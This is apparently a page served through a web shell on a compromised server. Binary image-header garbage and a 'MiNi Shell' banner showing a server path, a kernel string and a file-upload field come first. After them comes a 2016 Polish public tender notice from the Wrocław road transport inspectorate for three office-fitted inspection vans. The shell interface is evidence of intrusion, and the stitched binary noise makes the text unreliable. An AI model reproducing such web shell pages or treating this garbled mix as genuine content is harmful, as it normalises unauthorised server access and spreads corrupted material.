JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160825/302787-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 302787 - 2016
              z dnia 2016-08-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wrocław: Dostawa trzech fabrycznie nowych samochodów specjalizowanych z ze specjalistyczną zabudową biurową na użytek Wojewódzkiego Inspektoratu Transportu Drogowego Wrocławiu.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wojewódzki Inspektorat Transportu Drogowego we Wrocławiu, krajowy numer identyfikacyjny
              93272117500000, ul.
              ul. Krzywoustego 
              28,
              51165  
              Wrocław, woj.
              dolnośląskie, państwo
              , tel.
              713 265 160, e-mail
              , faks
              713 265 161.
              <br />
              Adres strony internetowej (URL): www.bip.dolnyslask.witd.gov.pl<br />
                Adres profilu nabywcy:

                www.bip.dolnyslask.witd.gov.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa terenowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dolnyslask.witd.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />dostarczyć amodzielnie lub pocztą do siedziby zamawiajacego<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zgodnie z art. 10c ust. 2 ustawy Prawo zamówień publicznych w związku z art. 18 ustawy z dnia 22 czerwca 2016r. o zmianie ustawy  Prawo zamówień publicznych oraz niektórych innych (Dz.U z 2016r. poz. 1020) ustaw składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015r. poz. 1830), osobiście lub za pośrednictwem posłańca,<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa trzech fabrycznie nowych samochodów specjalizowanych z ze specjalistyczną zabudową biurową na użytek Wojewódzkiego Inspektoratu Transportu Drogowego Wrocławiu.<br /><b>Numer referencyjny: </b>WAT.272.1.02.02.2016.CO<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Dostawa trzech fabrycznie nowych samochodów specjalizowanych ze specjalistyczna zabudową biurowa na użytek WITD we Wrocławiu.  
Samochód fabrycznie  nowy  - rok produkcji IV kwartał 2015 lub 2016
Dopuszczalna masa całkowita do 3,5 t.Nadwozie zamknięte o konstrukcji samonośnej typu furgon częściowo przeszklony.
Kabina kierowcy trzyosobowa, liczba ta musi wynikać z homologacji oferowanych samochodów. Kierownica musi znajdować się po lewej stronie. 
Wymiary przedziału przeznaczonego do zabudowy	
	długość minimalna  3 400 mm
	wysokość minimalna 1 800 mm
	szerokość minimalna 1 700 mm, mierzona pomiędzy wewnętrznymi powierzchniami ścian bocznych
Drzwi boczne prawe przesuwne z blokadą, przeszklone szybą. Druga szyba zamontowana w części biurowej po prawej stronie samochodu. Co najmniej jedna szyba z możliwością otwierania poprzez odsunięcie  lub uchylenie. 
Drzwi tylne pełne (bez szyb) dwuskrzydłowe, z kątem otwarcia min. 250°.
Dwie szyby po lewej stronie samochodu, przeciwległe do drzwi przesuwnych. Brak uchylnych lub otwieranych szyb po tej stronie pojazdu. Szyby przyciemnione technologią przydymiania lub oklejania.
Elektrycznie otwierane szyby w drzwiach przednich.
Elektrycznie ustawiane i podgrzewane  lusterka boczne.
Przeszklenie ścian bocznych samochodu w części przedziału biurowego z zastosowaniem przyciemnienia w stopniu od 70 do 90%.
Nadwozie lakierowane w kolorze ciemnozielonym , z tym, że pokrywa silnika, drzwi kierowcy i pasażera oraz drzwi tylne (pokrywa bagażnika) koloru białego.
Zamawiający dopuszcza pomalowanie elementów koloru białego lub ciemnozielonego poza fabryką. Wykonawca zamówienia udzieli gwarancji na wykonanie prac lakierniczych. 
Silnik wysokoprężny (diesel) z turbodoładowaniem o pojemności skokowej minimum 2100 cm3  mocy minimum 110 KW ( (pojemność oraz moc oferowanego silnika samochodu musi wynikać z jego homologacji). 
Norma emisji spalin: minimum Euro 5+ lub Euro 6
Napędzana przednia lub tylna oś pojazdu.
Skrzynia biegów manualna minimum 5-cio biegowa.
System kontroli trakcji (ESP lub równoważny).
Układ kierowniczy ze wspomaganiem.
Kolumna kierownicy, co najmniej z możliwością regulacji w min. w płaszczyźnie pionowej.
Układ hamulcowy ze wspomaganiem + ABS + ASR lub równoważne.
Hamulce tarczowe wymagane dla obu osi.
Co najmniej poduszka powietrzna dla kierowcy i pasażera.
Zbiornik paliwa o pojemności min. 75 l.
Obręcze stalowe min. 16 cali.
Założone opony zimowe z felgami
Światła do jazdy dziennej włączane automatycznie.  Zamawiający nie dopuszcza Skandynawskiej funkcji włączania świateł mijania
Reflektory przeciwmgłowe.
Materiałowa tapicerka siedzeń w ciemnej tonacji odporna na ścieranie.
Podłoga przedziału biurowego oraz przedziału magazynowego wykonana z powłoki antypoślizgowej, łatwo zmywalnej, połączonej szczelnie z zabudową ścian. 
Ściany boczne przedziału biurowego i sufit pokryte warstwą izolacji termiczno-dźwiękowej. Użyte materiały w przedziale biurowym o prędkości spalania nie większej niż 100 mm/min.
Po adaptacji pojazdy przystosowane do przewozu min. 3 osób ( z kierowcą) w pozycji siedzącej, dopuszczalna masa całkowita każdego pojazdu do 3,5 tony.
Pojazdy winny składać się z dwóch przedziałów: części przeznaczonej dla kierowcy i pasażerów wraz częścią biurową oraz przedziału magazynowego. 
Część przeznaczoną dla kierowcy i pasażerów oraz część biurową  oddziela ścianka działowa od 80 cm do 100 cm wysokości. 
W przedziale biurowym winny zostać zainstalowane : 2 siedziska dla inspektorów oraz 2 siedziska dla osób kontrolowanych. 
Siedziska dla inspektorów zlokalizowane na lewej ścianie przedziału biurowego, przodem zwrócone w kierunku drzwi wejściowych do przedziału.  
Siedziska dla kontrolowanych po przeciwległej stronie, na prawej ścianie przedziału.
Wszystkie siedzenia w przedziale muszą posiadać poszycie wykonane z materiału odpornego na zużycie mechaniczne, łatwe do utrzymania w czystości. Pod wszystkim siedziskami powinny znajdować się schowki z możliwością otwierania i systemem samoczynnego podtrzymania otwartej klapy.
Dwa stoliki o wymiarach (minimum 550 x 900 mm) pod komputer (laptop), jeden przylegający do ściany działowej z kabiną kierowcy, drugi przylegający do ściany działowej z przedziałem magazynowym.  Stolik zamontowany bez punktu podparcia w podłodze. Stoliki usytuowane pomiędzy siedziskami (dla inspektorów i kontrolowanych), zamontowane na szynie przesuwnej, w sposób umożliwiający przesunięcie stolików wzdłuż ścian działowych w celu ułatwienia zajmowania miejsc, 
z zabezpieczeniem przed przemieszczaniem się stolika podczas jazdy. Wytrzymałość stolików na obciążenie - min. 100 kg. Pod powierzchnią blatu szuflada umożliwiająca przechowywanie dokumentów w formacie A 4 o wysokości max.6 cm. 

Na lewej ścianie bocznej przedziału, obok siedziska dla inspektora - szafka przeznaczona do zainstalowania laserowego urządzenia wielofunkcyjnego (drukarka + kserokopiarka) z możliwością przechowywania materiałów eksploatacyjnych. Konstrukcja  szafki   powinna   uwzględniać  możliwość zabezpieczenia urządzeń oraz elementów wyposażenia przed ewentualnym przesunięciem w czasie jazdy oraz zapewniać łatwy dostęp i użytkowanie urządzeń bez wykonywania dodatkowych czynności(np. odpinanie pasów mocujących). Wymiary: szerokość 60 cm., wysokość 50 cm, głębokość 45 cm.  Zamawiający wymaga wykonania wcięcia o całkowitej długość 40 mm szerokości 20 mm zakończonego  promieniem r = 10 mm na wpuszczenie kabla zasilającego do prawej szuflady.
Przedział   biurowy   samochodu   wyposażony   w   dwie  trwale zamocowaną kasetki  metalowe (zamykane na klucz).
Na ścianie działowej oddzielającej przedział biurowy od przedziału magazynowego - od strony biurowej zestaw szafek z półkami 
i szuflad. Część półek i szafek musi umożliwiać przechowywanie w nich segregatorów na dokumenty formatu A4. Również, co najmniej część szuflad powinna być przystosowana do przechowywania dokumentów formatu A4.Należy przewidzieć miejsce na umundurowanie służbowe  wierzchnie- miejsce na garderobę z haczykami.
Wykonawca musi dołączyć  projekt zabudowy ścianki działowej oraz zabudowy przedziału biurowego do dokumentacji przetargowej.
Wszystkie  szafki  i  szuflady zabezpieczone  samozatrzaskowymi  zamkami, uniemożliwiającymi samoczynne otwarcie się podczas jazdy. 
Oświetlenie przedziału biurowego  reflektory ledowe umieszczone w górnej części przedziału biurowego oraz oświetlenie punktowe nad miejscami pracy (tj. nad stolikami pod komputer, punktowe kierunkowe reflektory ledowe zamontowane w suficie przedziału biurowego). Oświetlenie punktowe dodatkowe  załączane  z wyłącznika będącego w zasięgu ręki inspektora.  Dodatkowo zamocowane lampki  przy biurkach.
W przedziale biurowym, w miejscu zapewniającym możliwość prawidłowej obsługi wyposażenia pojazdu będzie znajdować się panel sterujący z wyświetlaczem dotykowym, posiadający następujące funkcje:
	sterowanie oświetleniem wewnętrznym przedziału oraz oświetleniem zewnętrznym pojazdu,
	sterowanie układem ogrzewania dodatkowego przedziału,
	obrazowanie poziomu naładowania dodatkowych akumulatorów oraz dźwiękową sygnalizację niskiego poziomu ich naładowania,
	wyświetlanie aktualnej daty, godziny, temperatury zewnętrznej.
	sterowanie układem klimatyzacji dodatkowego przedziału,
	zabezpieczenie akumulatorów przed głębokim rozładowaniem-odcięcie zasilania przy 11,5 V.

Zamontowane w pojeździe meble wykonane z materiałów wodoodpornych, dopuszczonych do stosowania w tego rodzaju  zabudowie zgodnie z wymaganymi atestami.
Klimatyzacja samochodowa co najmniej z regulacją manualną.
Klimatyzacja samochodowa rozbudowana o dodatkowy parownik zamontowany nad kabiną kierowcy, wylot chłodnego powietrza skierowany na przedział biurowy z możliwością ustawiania kierunku nawiewu.
Niezależny od silnika system ogrzewania przedziału biurowego
o mocy grzewczej co najmniej 2 kW z możliwością ustawienia temperatury w przedziale i termostatem  ogrzewanie postojowe (układ wydechowy systemu ogrzewania powinien być tak skonstruowany i umieszczony żeby  nie powodował przedostawania się spalin do przedziału biurowego przy otwartych drzwiach bocznych).  Co najmniej  2 wyloty ciepłego powietrza z układu ogrzewania rozmieszczone  równomiernie  w  całym   przedziale  biurowym, zapewniające jednakową temperaturę w całej przestrzeni przedziału. Elementy wyposażenia elektrycznego  przedziału  zabezpieczone  przed  bezpośrednim oddziaływaniem ciepłego powietrza z wylotów układu ogrzewania.
Wyloty ciepłego powietrza nie powinny być umieszczone bezpośrednio przy siedzeniach przeznaczonych dla kontrolujących.
Ściana   działowa   pomiędzy   przedziałem   magazynowym, a   przedziałem biurowym po  stronie  magazynowej   zabudowana otwartymi półkami  (konstrukcja z profili aluminiowych). Półki  wyposażone w zamontowane uchwyty umożliwiające unieruchomienie za pomocą  linek  lub pasów przewożonych  urządzeń i wyposażenia.
W  dolnej   części  zabudowy  przedziału  magazynowego  miejsce  na  wagi przewoźne o wymiarach jednego segmentu ok. 855 mm x 530 mm x 90 mm (minimum dla dwóch  segmentów). Z  uwagi na ciężar wag (ok. 20 kg dla jednego segmentu) zaprojektowane rozwiązanie powinno zapewniać możliwie równomierne rozłożenie nacisku na tylną oś pojazdu. Miejsca na wagi (podłogi schowka na wagi) wyłożyć blachą np. aluminiową - ze względu na konstrukcję wnęki.
Przewidziane miejsce na urządzenie do badania stopnia zadymienia spalin (dymomierza o wymiarach 60x30x30cm). Sposób  zabudowy powinien zapewniać bezpieczne mocowanie urządzeń. Sposób montażu musi umożliwiać łatwy i szybki  demontaż urządzenia.
Przewidziane miejsce na minimum cztery pachołki drogowe. Przymiar wysokości , lustro, apteczka.
Wykonawca musi dołączyć  projekt zabudowy przestrzeni magazynowej do dokumentacji przetargowej.
W części magazynowej na tylnych drzwiach zamontowany zbiornik na wodę do mycia rąk. Obieg wody grawitacyjny, zapewniony łatwy dostęp. Zamawiający wymaga założenie dodatkowego przewodu gumowego od kranu do dolnej krawędzi drzwi zamontowanego na stałe.
Zespół   2 dodatkowych   bezobsługowych   akumulatorów   żelowych (niezależnych od akumulatora fabrycznie zainstalowanego 
w pojeździe) o łącznej  pojemności min.  400 Ah.  Do  zestawu  akumulatorów podłączona przetwornica prądu z 12 na 230 V, zapewniająca wyjściowy prąd zmienny o pełnej sinusoidzie, umożliwiająca uzyskanie w gniazdach napięcia 230 V (o mocy min. 2000 WAT) wraz z instalacją przyłączeniową umożliwiającą zasilanie wewnętrznych odbiorników prądu (dwa komputery, laserowe urządzenie wielofunkcyjne, wagi przenośne, dymomierz). Zamontowana   instalacja powinna zapewniać możliwość jednoczesnego   użytkowania   wszystkich wymienionych urządzeń jednocześnie oraz zabezpieczać obwód drukarki - kserokopiarki przed chwilowymi spadkami napięcia. Zamawiający w razie potrzeby zobowiązuje się wypożyczyć Wykonawcy na czas wykonywania zabudowy jeden   zestaw   przewidywanych   do   użytku   urządzeń,   w  celu przeprowadzenia testów.
Generator prądotwórczy o mocy minimalnej 1,6 kW, zapewniający doładowanie zespołu dwóch dodatkowych akumulatorów oraz użytkowanie zainstalowanych odbiorników prądu (dwa komputery, laserowe urządzenie wielofunkcyjne, wagi przenośne, dymomierz, oświetlenie wewnętrzne i zewnętrzne) zamontowany w części technicznej. Podczas pracy generatora musi istnieć możliwość użytkowania wszystkich wskazanych urządzeń jednocześnie. Silnik benzynowy, czterosuwowy lub Diesla. Czas pracy bez tankowania przy pełnym obciążeniu min. 2,5h. Zabezpieczenie termiczne i przeciążeniowe generatora. Podczas pracy generator powinien zasilać wszystkie gniazda 230V i ładować akumulatory dodatkowe, a po jego wyłączeniu zasilanie 230V powinno odbywać się poprzez użycie ręcznego przełącznika źródła zasilania - z przetwornicy.
Musi istnieć możliwość łatwego wyjmowania generatora oraz zasilania instalacji elektrycznej  podczas pracy generatora poza przedziałem technicznym (na zewnątrz pojazdu).
  Zastosowany generator prądotwórczy (agregat) musi spełniać przepisy obowiązujące w Unii Europejskiej dla tego typu urządzeń. Potwierdzeniem spełnienia powyższego wymogu jest deklaracja zgodności wystawiona zg. z  Ustawą o systemie oceny zgodności z dnia 30.08.2002r.(Dz.U. z 2002 r., nr 166,poz.1360 ze zm.) potwierdzającą spełnienie co najmniej Dyrektyw 2006/42/WE, Dyrektywy 2004/108/WE, Dyrektywy 2000/14/WE-2005/88/We, dokument potwierdzający posiadanie homologacji przez silnik agregatu uzyskanej zgodnie z Dyrektywą 97/68/WE. Zamawiający wymaga dodatkowego kabla zasilającego do agregatu, który zasili złącze 230V pojazdu  o długości 5m.
Bezobsługowy, automatyczny układ ładowania (ładowarka min. 50A) dwóch akumulatorów dodatkowych oraz akumulatora rozruchowego przy podłączonym zasilaniu w czasie postoju przy podłączonym zasilaniu 230 V z jednym gniazdem zewnętrznym zamontowanym w bocznej ścianie pojazdu lub tylnym zderzaku.
Alternator zamontowany w pojeździe musi zapewniać podczas pracy silnika ładowanie zarówno akumulatora rozruchowego jak i akumulatorów dodatkowych zamontowanych w przedziale biurowym. Przewód do ładowania z zewnętrznego źródła zasilania o długości min. 10 m.
Zabezpieczenie uniemożliwiające rozruch silnika przy podłączonym zasilaniu zewnętrznym 230 V lub uruchomionym agregacie prądotwórczym wraz z zabezpieczeniem przeciwporażeniowym. Zabezpieczenie przed jednoczesnym podłączeniem zasilania zewnętrznego i zasilania z agregatu prądotwórczego. 
Centralny wyłącznik źródła zasilania dla przedziału biurowego, zabezpieczony przed przypadkowym użyciem.
Minimum osiem gniazd 230 V w przedziale biurowym do zasilania urządzeń biurowych oraz dwa w przedziale  magazynowym. Gniazda w przedziale biurowym w miejscu łatwo dostępnym  (powyżej poziomu stolików). Gniazda nad biurkiem inspektorów w następującej konfiguracji: zasilanie , zasilanie, RJ-45, zapalniczka.   Jedno   samochodowe gniazdo 12V (typu zapalniczka) w przedziale magazynowym i co najmniej dwa w przedziale biurowym w tym jedno zasilane poza wyłącznikiem głównym do ładowania latarki na ścianie dzielącej przedział biurowy i magazynowy  
Włącznik świtał punktowego powinien znajdować się w miejscu uniemożliwiając jego przypadkowe przyciśnięcie. 
Okablowanie wewnętrznej instalacji transmisji danych zabudowane, umożliwiające jednoczesne podłączenie urządzenia wielofunkcyjnego i dwóch komputerów oraz współpracę komputerów z drukarką (zabudowane przewody UTP- typu skrętka  z końcówkami Rj 45 z miejsca przewidzianego na ruter/modem internetowy (w prawym górnym rogu przy bocznej ściance od strony wewnętrznej przy miejscu na drukarkę) do urządzenia wielofunkcyjnego oraz do biurek inspektorów  za pomocą gniazda RJ-45. zapewniające komunikację pomiędzy komputerami i urządzeniem wielofunkcyjnym).
Zapewniony dostęp do zamontowanej w pojeździe przetwornicy
Pojazd wyposażony po dwie pary reflektorów  zewnętrzne typu LED ze światłem rozproszonym, zamontowane na stałe w górnej tylnej 
i przedniej części samochodu po jego prawej stronie i lewej stronie. Zasilanie elektryczne z zespołu dwóch akumulatorów dodatkowych. 
Belka świetlna z dwoma lampami błyskowymi koloru niebieskiego zamontowana w sposób trwały na dachu centralnie z przodu samochodu z podświetlaną tablicą koloru białego z napisem barwy czarnej INSPEKCJA TRANSPORTU DROGOWEGO z przodu i z tyłu belki, zgodnie ze wzorem określonym w rozporządzeniu Ministra Transportu , Budownictwa i Gospodarki Morskiej z dnia 10.04.2012r. w sprawie wzoru odznaki identyfikacyjnej inspektorów Inspekcji Transportu Drogowego oraz oznakowania pojazdów służbowych Inspekcji Transportu Drogowego
( Dz.U. z 2012r.,poz.402). 
Lampy ostrzegawcze oparte  o technologię LED.
Zasilanie z akumulatora rozruchowego.
Dwa dodatkowe światła za lub na przedniej atrapie silnika wysyłające sygnał świetlny barwy niebieskiej działające wspólnie z belkami świetlnymi (z błyskownikami w technologii LED).
Zasilanie z akumulatora rozruchowego.  Światła zamontowane prostopadle do jezdni.
Urządzenie wysyłające sygnały dźwiękowe o zmiennym tonie. Belka może być zintegrowana z urządzeniem wysyłającym sygnały dźwiękowe o zmiennym tonie, stanowiącym obowiązkowe wyposażenie dla samochodu uprzywilejowanego. 
W razie oddzielnego montażu urządzenia wysyłającego zmienny sygnał dźwiękowy sterowanie sygnałami świetlnymi oraz włączanie sygnału dźwiękowego odbywać się musi z jednego panelu łatwo dostępnego dla kierowcy pojazdu. Zamontowane sygnały ostrzegawcze muszą spełniać warunki, o których mowa w § 25 i 26 rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r.   w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (t.j. Dz.U. z 2015r., poz.305).
Zasilanie z akumulatora rozruchowego.
Belka świetlna z dwoma lampami błyskowymi koloru niebieskiego zamontowana w sposób trwały na dachu centralnie z tyłu samochodu z tablicą tekstową LED do wyświetlania komunikatów słownych o zmiennej treści (możliwość zaprogramowania minimum 50 komunikatów w różnych językach np. niemiecki, angielski, rosyjski itp.  dostępne znaki do zaprogramowania  polskie, cyrylica itp.), np. ZJEDŹ NA PARKING, STOP, KONTROLA, tablica winna również umożliwiać wyświetlanie komunikatu w formie szyldu podświetlanego INSPEKCJA TRANSPORTU DROGOWEGO w trybie standardowym. 
Tryb wyświetlania komunikatu na tablicy winien być widoczny na panelu sterownia tablicą.
Sterownik do tablic tekstowych winien umożliwiać podgląd w czasie rzeczywistym treści oraz trybu wyświetlania komunikatu.
Lampy ostrzegawcze oparte o technologię LED.
